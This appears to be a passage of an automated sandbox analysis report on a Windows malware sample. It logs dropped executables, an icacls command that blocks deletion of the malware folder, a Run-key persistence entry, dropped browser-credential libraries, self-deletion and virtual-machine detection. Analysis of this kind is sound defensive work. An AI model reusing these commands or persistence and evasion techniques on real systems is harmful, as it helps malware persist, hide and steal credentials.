Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\A658.exe C:\Users\user\AppData\Local\Temp\A658.exe
Source: C:\Users\user\AppData\Local\Temp\A658.exe Process created: C:\Users\user\AppData\Local\Temp\A658.exe C:\Users\user\AppData\Local\Temp\A658.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\D0E3.dll
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\D0E3.dll
Source: C:\Users\user\AppData\Local\Temp\A658.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: unknown Process created: C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415\A658.exe C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415\A658.exe --Task
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\E69F.exe C:\Users\user\AppData\Local\Temp\E69F.exe
Source: C:\Users\user\AppData\Local\Temp\A658.exe Process created: C:\Users\user\AppData\Local\Temp\A658.exe "C:\Users\user\AppData\Local\Temp\A658.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\33.exe C:\Users\user\AppData\Local\Temp\33.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\28E9.exe C:\Users\user\AppData\Local\Temp\28E9.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A658.exe Process created: C:\Users\user\AppData\Local\Temp\A658.exe C:\Users\user\AppData\Local\Temp\A658.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A658.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415" /deny *S-1-1-0:(OI)(CI)(DE,DC) Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\D0E3.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A658.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\28E9.tmp Jump to behavior
Source: softokn3.dll.20.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: sqlite3.dll.20.dr, nss3.dll.20.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.20.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3.dll.20.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %s
Source: sqlite3.dll.20.dr, nss3.dll.20.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sqlite3.dll.20.dr, nss3.dll.20.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: sqlite3.dll.20.dr, nss3.dll.20.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.20.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.20.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.20.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.20.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.20.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: sqlite3.dll.20.dr, nss3.dll.20.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.20.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: sqlite3.dll.20.dr, nss3.dll.20.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3.dll.20.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: sqlite3.dll.20.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: sqlite3.dll.20.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.20.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0040A1FE CreateToolhelp32Snapshot,Process32First,Process32Next, 20_2_0040A1FE
Source: C:\Users\user\AppData\Local\Temp\E69F.exe Mutant created: \Sessions\1\BaseNamedObjects\iqroq5112542785672901323
Source: A658.exe String found in binary or memory: set-addPolicy
Source: A658.exe String found in binary or memory: id-cmc-addExtensions
Source: C:\Users\user\AppData\Local\Temp\A658.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A658.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: 5tLwjRFzAW.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\cakap\zitagabizu\hiwefikomup18 da.pdb source: 28E9.exe, 00000014.00000000.366061081.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 28E9.exe.4.dr
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: A658.exe, A658.exe, 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: freebl3.pdb source: freebl3.dll.20.dr
Source: Binary string: softokn3.pdbp source: softokn3.dll.20.dr
Source: Binary string: C:\juyirac\93 sadenisijona\maledi\57\vecukukey\danoxitujeya\xi.pdb source: A658.exe, 00000021.00000000.467498504.0000000000401000.00000020.00000001.01000000.00000011.sdmp, A658.exe, 00000027.00000000.481944104.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, A658.exe.4.dr, A658.exe.28.dr
Source: Binary string: FC:\cakap\zitagabizu\hiwefikomup18 da.pdb source: 28E9.exe, 00000014.00000000.366061081.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 28E9.exe.4.dr
Source: Binary string: mozglue.pdb@+ source: mozglue.dll.20.dr
Source: Binary string: ZC:\juyirac\93 sadenisijona\maledi\57\vecukukey\danoxitujeya\xi.pdb source: A658.exe, 00000021.00000000.467498504.0000000000401000.00000020.00000001.01000000.00000011.sdmp, A658.exe, 00000027.00000000.481944104.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, A658.exe.4.dr, A658.exe.28.dr
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: A658.exe, 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: nss3.dll.20.dr
Source: Binary string: mozglue.pdb source: mozglue.dll.20.dr
Source: Binary string: \Downloads\Documents\f3iwnx51rxg\output.pdb source: 33.exe.4.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.20.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.20.dr
Source: Binary string: C:\jid.pdb source: 5tLwjRFzAW.exe, irbiwat.4.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.20.dr

Data Obfuscation
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Unpacked PE file: 20.2.28E9.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Unpacked PE file: 0.2.5tLwjRFzAW.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\irbiwat Unpacked PE file: 17.2.irbiwat.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Unpacked PE file: 20.2.28E9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00402847 push ebp; ret 0_2_00402848
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00402E56 push eax; ret 0_2_00402EBF
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00402E5E push eax; ret 0_2_00402EBF
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00402E6A push eax; ret 0_2_00402EBF
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00402E70 push eax; ret 0_2_00402EBF
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00402E05 push eax; ret 0_2_00402EBF
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00402E1F push eax; ret 0_2_00402EBF
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00402E88 push eax; ret 0_2_00402EBF
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00402E8F push eax; ret 0_2_00402EBF
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00402E96 push eax; ret 0_2_00402EBF
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00402EA4 push eax; ret 0_2_00402EBF
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00401AAC push edi; iretd 0_2_00401AAD
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00402DB7 push eax; ret 0_2_00402EBF
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00402847 push ebp; ret 17_2_00402848
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00402E56 push eax; ret 17_2_00402EBF
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00402E5E push eax; ret 17_2_00402EBF
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00402E6A push eax; ret 17_2_00402EBF
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00402E70 push eax; ret 17_2_00402EBF
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00402E05 push eax; ret 17_2_00402EBF
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00402E1F push eax; ret 17_2_00402EBF
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00402E88 push eax; ret 17_2_00402EBF
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00402E8F push eax; ret 17_2_00402EBF
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00402E96 push eax; ret 17_2_00402EBF
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00402EA4 push eax; ret 17_2_00402EBF
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00401AAC push edi; iretd 17_2_00401AAD
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00402DB7 push eax; ret 17_2_00402EBF
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_040E28AE push ebp; ret 17_2_040E28AF
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_040E1B13 push edi; iretd 17_2_040E1B14
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0041C24D push esp; ret 20_2_0041C250
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0041C25C push 940041C2h; retn 0041h 20_2_0041C261
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0043A327 push eax; iretd 20_2_0043A328
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00408ADD LocalAlloc,GetDesktopWindow,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,GetClientRect,SetStretchBltMode,GetSystemMetrics,StretchBlt,GetSystemMetrics,StretchBlt,SelectObject,GetObjectW,LocalAlloc,CreateFileW,CreateFileW,LocalAlloc,LocalAlloc,StrCpyW,WideCharToMultiByte,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteObject,DeleteObject, 20_2_00408ADD
Registers a DLL
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\D0E3.dll
PE file contains sections with non-standard names
Source: nss3.dll.20.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.20.dr Static PE information: section name: .didat
Source: mozglue.dll.20.dr Static PE information: section name: .00cfg
Source: freebl3.dll.20.dr Static PE information: section name: .00cfg
Source: softokn3.dll.20.dr Static PE information: section name: .00cfg
Source: sqlite3.dll.20.dr Static PE information: section name: /4
Source: sqlite3.dll.20.dr Static PE information: section name: /19
Source: sqlite3.dll.20.dr Static PE information: section name: /31
Source: sqlite3.dll.20.dr Static PE information: section name: /45
Source: sqlite3.dll.20.dr Static PE information: section name: /57
Source: sqlite3.dll.20.dr Static PE information: section name: /70
Source: sqlite3.dll.20.dr Static PE information: section name: /81
Source: sqlite3.dll.20.dr Static PE information: section name: /92
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\irbiwat Jump to dropped file
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\28E9.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\28E9.exe File created: C:\Users\user\AppData\LocalLow\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\28E9.exe File created: C:\Users\user\AppData\LocalLow\vcruntime140.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\E69F.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\28E9.exe File created: C:\Users\user\AppData\LocalLow\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\28E9.exe File created: C:\Users\user\AppData\LocalLow\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A658.exe File created: C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415\A658.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\28E9.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\33.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\A658.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\irbiwat Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\D0E3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\28E9.exe File created: C:\Users\user\AppData\LocalLow\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\28E9.exe File created: C:\Users\user\AppData\LocalLow\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A658.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A658.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\5tlwjrfzaw.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\irbiwat:Zone.Identifier read attributes | delete Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00408ADD LocalAlloc,GetDesktopWindow,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,GetClientRect,SetStretchBltMode,GetSystemMetrics,StretchBlt,GetSystemMetrics,StretchBlt,SelectObject,GetObjectW,LocalAlloc,CreateFileW,CreateFileW,LocalAlloc,LocalAlloc,StrCpyW,WideCharToMultiByte,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteObject,DeleteObject, 20_2_00408ADD
Uses cacls to modify the permissions of files
Source: C:\Users\user\AppData\Local\Temp\A658.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A658.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E69F.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 5tLwjRFzAW.exe, 00000000.00000002.295033030.00000000026F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\irbiwat Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\irbiwat Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\irbiwat Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\irbiwat Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\irbiwat Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\irbiwat Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5332 Thread sleep time: -41200s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5356 Thread sleep time: -39500s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5224 Thread sleep time: -33200s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5232 Thread sleep time: -33800s >= -30000s Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 580 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 412 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 395 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 450 Jump to behavior
Found evasive API chain checking for process token information
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0040ABD8 LocalAlloc,LocalFree,LocalAlloc,GetLogicalDriveStringsW,GetLogicalDriveStringsW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 20_2_0040ABD8
Source: C:\Users\user\AppData\Local\Temp\28E9.exe API call chain: ExitProcess graph end node
Source: E69F.exe, 00000023.00000003.478816889.000000000054A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWlW%SystemRoot%\system32\mswsock.dll*
Source: explorer.exe, 00000004.00000000.256230443.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.256626129.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
Source: explorer.exe, 00000004.00000000.247962975.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000004.00000000.277925084.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.256626129.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: A658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
Source: explorer.exe, 00000004.00000000.256626129.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
Source: explorer.exe, 00000004.00000000.252178426.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.249598088.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: A658.exe, 0000001C.00000002.496916478.000000000088B000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000003.460901218.000000000088B000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000000.256626129.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
Source: explorer.exe, 00000004.00000000.286096481.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: A658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
